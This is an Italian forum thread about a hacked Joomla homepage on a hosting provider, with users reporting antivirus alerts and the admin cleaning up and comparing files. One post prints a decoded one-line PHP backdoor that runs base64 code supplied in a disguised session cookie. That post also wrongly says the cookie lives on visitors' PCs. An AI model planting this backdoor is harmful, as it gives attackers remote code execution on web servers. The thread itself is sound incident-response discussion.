SpazzaVento 0 Posted May 9, 2010 Non so se a voi accade, ma oggi se cerco di entrare in www.pepperfriends.com il mio antivirus (avast) mi segnala un virus e mi blocca la connessione. A voi risulta? Share this post Link to post Share on other sites
tribo75 18 Posted May 9, 2010 Non so se a voi accade, ma oggi se cerco di entrare in www.pepperfriends.com il mio antivirus (avast) mi segnala un virus e mi blocca la connessione. A voi risulta? Io sono passato ad avira e non mi dà nessuna segnalazione. esattamente che messaggio ti dà? Share this post Link to post Share on other sites
hot cat 1,220 Posted May 9, 2010 Io sono passato ad avira e non mi dà nessuna segnalazione.esattamente che messaggio ti dà? Anche il mio lo fa.. ma solo sulla Home page del sito,non quella del forum.. Mi dice che ..(non mi ricordo,e avast è sull'altro pc ) Sono andato a controllare ..è un Troyan ... Esattamente il messaggio dice:" HTML FRAME-NM [TRI] Se però si va direttamente sul forum non succede.. Share this post Link to post Share on other sites
hot cat 1,220 Posted May 9, 2010 Ps Già da 2 giorni...(oggi il terzo).. C'è da fare qualcosa? Grazie Share this post Link to post Share on other sites
PepperAdmin 132 Posted May 9, 2010 Grazie per le segnalazioni! Ho rilevato una variazione del file index.php sulla home page del forum; a prima vista c'e' un codice estraneo iniziale che e' probabilmente la causa del problema. Ho ripristinato una copia di backup del file e cambiato la password del dominio. Probabilmente il buco e' legato a qualche falla in Joomla, ora adeguo all'ultima versione disponibile. Segnalatemi tempestivamente se rilevate altri problemi. Grazie! PS. Qualcuno esperto di web puo' darmi qualche dritta su come dall'esterno e' possibile arrivare a modificare files del sito? La faccenda e' preoccupante e dimostra, ancora una volta, l'intrinseca debolezza di Internet ... Share this post Link to post Share on other sites
Lonewolf 18,106 Posted May 9, 2010 Per chi ci capisce qualcosa, questo era il codice aggiunto all'inizio di index.php malware.pdf c'era anche un file "estraneo" (non presente nelle mie copie) con una serie di tab iniziali per non far vedere parte del contenuto ad un esame superficiale con Notepad o simili (ho sostituito i tab con - nell'allegato) mailcheck.pdf Qualche idea su cosa fa e a cosa serve? Share this post Link to post Share on other sites
Lonewolf 18,106 Posted May 10, 2010 Per scrupolo ho anche installato l'ultima versione di Joomla (con cui e' realizzata l'home page) Segnalatemi se notare anomalie. Da ricerche sul web sembra pero' che questo tipo di problema sia ricorrente su Aruba e che arrivi da "dentro", cioe' siano gli stessi server Aruba ad essere attaccati ... speriamo di no, non ci sarebbe mai certezza di essere al sicuro Ora comunque faccio anche una bella copia di tutto ... Share this post Link to post Share on other sites
Lonewolf 18,106 Posted May 10, 2010 Qualche considerazione sugli eventi legati all'attacco al sito Pepperfriends ... Mi sono accorto del problema prima di leggere questo topic perche' Google mi ha segnalato via email che il sito Eureka (ospitato nello stesso spazio web di pepperfriends) conteneva malware ed era quindi segnalato come pericoloso nel motore di ricerca. La segnalazione di Google e' legittima, ma "il modo" e' decisamente fuori luogo e la burocrazia che ruota attorno a queste situazioni e' allucinante ... Se cercate eureka-sas su Google appare il link al mio sito aziendale seguito dal messaggio: "Questo sito potrebbe arrecare danni al tuo computer" E' evidente che un visitatore occasionale, di fronte a tale messaggio, girera' al largo e non si fara' piu' vedere ... Un piu' moderato "Questo sito potrebbe essere sotto attacco di malware, anche contro la sua volonta'. Il gestore del sito e' stato avvisato. Siete pregati di visitarlo piu' avanti ..." sarebbe ben piu' accettabile. Per il sito Eureka non c'e' in realta' alcun problema (di fatto contiene solo aggiornamenti che gli utenti scaricano direttamente, senza passare dalla home page ne tantomeno da Google), ma considerate che questo sarebbe potuto succedere a Pepperfriends. L'incubo comunque inizia quando si cerca di rimediare alla situazione. Le istruzioni di Google sono confuse e non correlate a quanto effettivamente si verifica seguendole alla lettera ... 1.Nella home page degli Strumenti per i Webmaster, seleziona il sito desiderato.2.Nel messaggio secondo cui parti del sito potrebbero distribuire malware, fai clic su Altri dettagli. 3.Fai clic su Richiedi un controllo Bene! Peccato che subito dopo la segnalazione la funzione Diagnostica (peraltro non citata nelle istruzioni) apparisse il messaggio "Nessun malware"; un messaggio simile a quello citato al punto 2 e' apparso molto piu' tardi, ore dopo che avevo gia' ripulito il sito ... Del pulsante o scritta cliccabile citati al terzo punto, nessuna traccia ... Da ricerche sul forum Assistenza sembra che tale opzione si attivi dopo ore o giorni; l'intento, se davvero e' così, e' chiaro ... impedire che il webmaster clicchi subito sulla richiesta di controllo, senza correggere il problema; ma, ammesso sia vera questa mia ipotesi, perche' non scriverlo nelle istruzioni? Queste situazioni sono "frustranti" Il problema principale e' che non c'e' un interlocutore con cui "parlare" per risolvere il problema; il forum di assistenza da risposte confuse, contrastanti tra loro o con le istruzioni o inapplicabili (quando le da') Non c'e' una email diretta, non c'e' un telefono ... Almeno quando ci si scontra con la burocrazia nella vita reale, ad un certo punto si puo' prendere per il collo il burocrate di turno qui e' come sbattere contro un muro di gomma! Di fatto un sito puo' restare segnalato come "malizioso" per ore o giorni o ... settimane? Le implicazioni di questa situazione, a ben pensarci, sono enormi! Google e' un servizio di cui tutti piu' o meno beneficiano, ma naturalmente (anche se a prima vista sembra gratuito) ha i suoi guadagni per i servizi resi. Pero', a differenza di quanto succede quando si stipula un qualsiasi contratto in qualunque forma, non c'e' alcuna reale possibilita' di controllo sul suo operato. Se ci si trova un sito importante "bloccato" (anche dopo averlo ripulito tempestivamente) per giorni a chi chiedere i danni subiti? Che succede se e' bloccato in questo modo un sito (tanto per fare un esempio) di un partito politico in piena campagna elettorale? o comunque un sito di grande importanza per la comunita' nel pieno della sua legittima attivita' ? La segnalazione di Google e', ripeto, legittima (dopo tutto si puo' sempre accedere al sito senza passare da Google), ma la verifica di avvenuto rientro nella normalita' deve essere tempestiva! In questo momento la segnalazione di Google sul sito Eureka e' sicuramente "falsa" e quindi Google arreca un potenziale danno invece del servizio per cui e' stato progettato (e scelto da tanti utenti) Con meccanismi di questo tipo ci si puo' trovare in breve tempo e senza nemmeno accorgersene in balia del "grande fratello" ... ci vuol poco a far diventare una "burocrazia ottusa" che blocca siti a caso in una "burocrazia intelligente" che blocca siti ben precisi! Altro che liberta' sul web ... Attenta considerazione merita anche la possibilita', non tanto remota, che la variazione ai files indice del sito arrivi dall' "interno", per attacchi subiti dal provider stesso ... Aruba al momento non ha risposto alle mie domande in merito (e probabilmente non rispondera'), ma la sola possibilita' e' "da brividi" In una simile ipotesi, nessun contenuto sul web e' al sicuro ... C'e' davvero molto su cui riflettere Share this post Link to post Share on other sites
kendalen 0 Posted May 10, 2010 Ciao A questo link: http://badwarebusters.org/main/itemview/14320 ho trovato qualcosa in più. Non è che anche nella /CGI-BIN del nostro beneamato sito c'è il file chat.pl? Se sì, è da togliere, da quanto ho capito... Edit: ho trovato anche questo: http://forum.html.it/forum/showthread.php?threadid=1365830, se può servire... Share this post Link to post Share on other sites
Lonewolf 18,106 Posted May 10, 2010 La cgi-bin e' vuota ... Do un'occhiata ai link ... grazie! Share this post Link to post Share on other sites
Bassgey 4 Posted May 10, 2010 Per chi ci capisce qualcosa, questo era il codice aggiunto all'inizio di index.php malware.pdf c'era anche un file "estraneo" (non presente nelle mie copie) con una serie di tab iniziali per non far vedere parte del contenuto ad un esame superficiale con Notepad o simili (ho sostituito i tab con - nell'allegato) mailcheck.pdf Qualche idea su cosa fa e a cosa serve? Il codice delle pagine php che sembra essere scritto in modo incomprensibile in realtà è del codice vero e proprio che è stato però scritto dopo essere stato codificato in base64 (codifica utilizzata nel protocollo SMTP per gli allegati) e viene eseguito (tramite la funzione eval) facendone la decodifica quando il file viene letto dal server web tramite la funzione php eval(base64_decode('')). Il contenuto decodificato del file mailcheck.pdf è il seguente: if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;} Questa funzione effettua un'ulteriore decodifica del contenuto del cookie che dovrebbe essere stato installato (antivirus permettendo) nel pc di chi ha visitato la pagina e che conterrebbe del codice potenzialmente dannoso. Il fatto che aruba sia soggetta a questi attacchi è scandaloso (uno dei motivi per cui la evito), a prima analisi avrei detto che fosse un problema di joomla ma il fatto che anche altri siti ospitati sugli stessi server siano stati colpiti (costruiti con joomla anche quelli?) potrebbe appunto far pensare un problema di aruba che ripeto è una cosa molto grave e degna di richiesta danni. Quando ho un attimo provo a cercare qualche info in più sul malware e sul codice aggiuntivo nell'index.php. Share this post Link to post Share on other sites
Bassgey 4 Posted May 10, 2010 Qui incollando il testo codificato in base64 è possibile eseguirne la decodifica e vedere il codice "nascosto". Share this post Link to post Share on other sites
Lonewolf 18,106 Posted May 10, 2010 Grazie Fabio! La questione che piu' mi preme e' se c'e' la possibilita' che l'attacco abbia modificato altri files oltre a index.php ... A prima vista, sembra proprio di no, pero' e' difficile controllare tutte le cartelle e sottocartelle. In ogni caso tengo sotto costante controllo i files che erano stati modificati, per intervenire subito nel caso fossero modificati di nuovo. Tra le possibili spiegazioni dell'accaduto le uniche plausibili che mi vengono in mente sono una falla in Aruba (ahi) o un virus sul mio Pc collegato a Internet in grado di "rubare" utente e password per l'accesso al sito via ftp o in altro modo. Sul PC pero' non abbiamo particolari problemi o segnalazioni da parte dell'antivirus (McAfeee). Boh?! Intanto sulla pagina di manutenzione/controllo dei siti e' apparsa l'opzione per richiedere un nuovo controllo del sito, con le modalita' esatte descritte nelle istruzioni ... ma 24 ore dopo la segnalazione! Evidentemente e' troppo difficile evidenziare questo fatto nelle istruzioni, pur dopo numerosi interventi di richiesta chiarimenti sul forum di assistenza (si fa per dire, ci sono solo domande e praticamente nessuna risposta ...) Ho risposto da solo alle mie domande in modo che almeno per chi arriva dopo sia chiaro come funziona ... Share this post Link to post Share on other sites
Lonewolf 18,106 Posted May 10, 2010 Altra questione ... Chi ha ricevuto segnalazioni dal proprio antivirus accedendo alla nostra homepage, continua a riceverne o adesso e' tutto a posto? Share this post Link to post Share on other sites
hot cat 1,220 Posted May 10, 2010 Altra questione ...Chi ha ricevuto segnalazioni dal proprio antivirus accedendo alla nostra homepage, continua a riceverne o adesso e' tutto a posto? Confermo che ora è tutto apposto Grazie (di tutto) Share this post Link to post Share on other sites
kendalen 0 Posted May 10, 2010 Confermo che ora è tutto appostoGrazie (di tutto) Participio passato del verbo "apporre"? Share this post Link to post Share on other sites
SpazzaVento 0 Posted May 10, 2010 Sono contento che la mia segnalazione abbia evidenziato qualcosa di importante anche se ammetto di non avere capito granché di cosa possa esser successo! Adesso comunque il mio avast non segnala più nulla!!! Share this post Link to post Share on other sites
Bassgey 4 Posted May 10, 2010 Ciao, per essere sicuri al 100% sarebbe necessario a partire da un backup sicuro di effettuare, tramite software appositi, un hash (md5) di tutti i file e di confrontarli con gli hash dei file attualmente sul server. L'ipotesi del virus sul tuo pc la vedo un pò remota in quanto solitamente questo tipo di attacchi ai siti web non sono rivolti ai pc, se così fosse cmq tra non molto potresti ritrovarti lo stesso problema (hai fatto bene ad effettuare il cambio della password ma a volte questa difficoltà potrebbe essere sorpassata da chi attacca). Sono sempre più convinto che sia un problema di aruba che mantiene i server con un livello di sicurezza troppo basso: leggi qui Share this post Link to post Share on other sites
Lonewolf 18,106 Posted May 11, 2010 Grazie! Ho scaricato l'intero sito Pepperfriends, in posizione diversa dalla precedente copia. Oggi confronto le due (file per file) per rilevare differenze nei files php/html ... Share this post Link to post Share on other sites
Lonewolf 18,106 Posted May 11, 2010 Controllo effettuato! Nessun file php/html del sito e' stato modificato rispetto a un paio di settimane fa (oltre a index.php e mailcheck.php gia' ripristinati). (Fanno eccezione ovviamente i files di joomla, visto che ho installato un aggiornamento) Intanto Google ha "riabilitato" il sito Eureka, ulteriore riprova che non c'e' alcun malware attivo. Controllero' spesso i files della home del sito per rilevare tempestivamente qualsiasi variazione inattesa. Chiunque riceva segnalazioni strane entrando nel forum o nella home page mi avvisi (subito!) ... grazie Share this post Link to post Share on other sites
hot cat 1,220 Posted May 11, 2010 Participio passato del verbo "apporre"? ..Errore di "battenza"..... Pòta.... Share this post Link to post Share on other sites
hot cat 1,220 Posted June 14, 2010 Non so se è un problema mio,ma lo segnalo comunque.. stavo provando ad entrare nel forum digitando dalla barra degli indirizzi ...dopo 4 o 5 volte mi è uscita questa pagina index.php.htm_errore.txt la parola errore l'ho messa io per trovare il file facilmente,il resto era il nome nel "salvataggio" (Scusate i termini non specifici,ma sono abbastanza "Gnorante" ) poi ho cercato nella mia posta,ho cliccato su un link che avevo mandato a un amico,e tutto ha funzionato per il meglio.. non so,ditemi voi..Grazie Share this post Link to post Share on other sites
Lonewolf 18,106 Posted June 14, 2010 Il messaggio non mi dice molto, forse una momentanea defaillance del database ... di sicuro non c'e' un file con quel nome (index.php.htm) nella home page. Ora funziona? Io ho provato lo stesso accesso (da barra indirizzi) e funziona correttamente. Share this post Link to post Share on other sites
gitadell 0 Posted June 14, 2010 Scusate, ma ho letto solo ora questo topic. Il mio Avast non mi dà, attualmente, problemi, anche se, ultimamente, mi collego solo e direttamente al forum. Suggerisco all'admin del sito di aggiornarsi alla versione 1.5.18 di joomla che ha risolto alcuni problemi di sicurezza, anche se, analizzando quanto è successo, sono più propenso a ritenere che il problema rilevato dai nostri utenti sia più facilmente addossabile ad altri siti che condividono il medesimo spazio web di pepperfriends. Infatti, in caso di spazi WEB condivisi, capita purtroppo di frequente che se viene portato un attacco ad un sito, ne patiscono le stesse conseguenze anche altri siti che ne condividono i server. Penso quindi che pepperfriends.com sia immune da problematiche. Ciao Italo Share this post Link to post Share on other sites
hot cat 1,220 Posted June 14, 2010 Ho riprovato e ora funziona...mah!! Comunque mi è parso strano,la pagina aveva in "testata" il logo pepperfriends,lo sfondo era rosso molto chiaro e le scritte rosso scuro,l'ho salvato anche come pagina web,ma non è restato il logo e alcuni simboli tipo "divieto d'accesso"... Comunque scusate per "l'allarme" ma, non volevo ripetere l'errore dell'altra volta che ho pensato "tanto di sicuro qualcun altro lo vedrà"... Teo Share this post Link to post Share on other sites
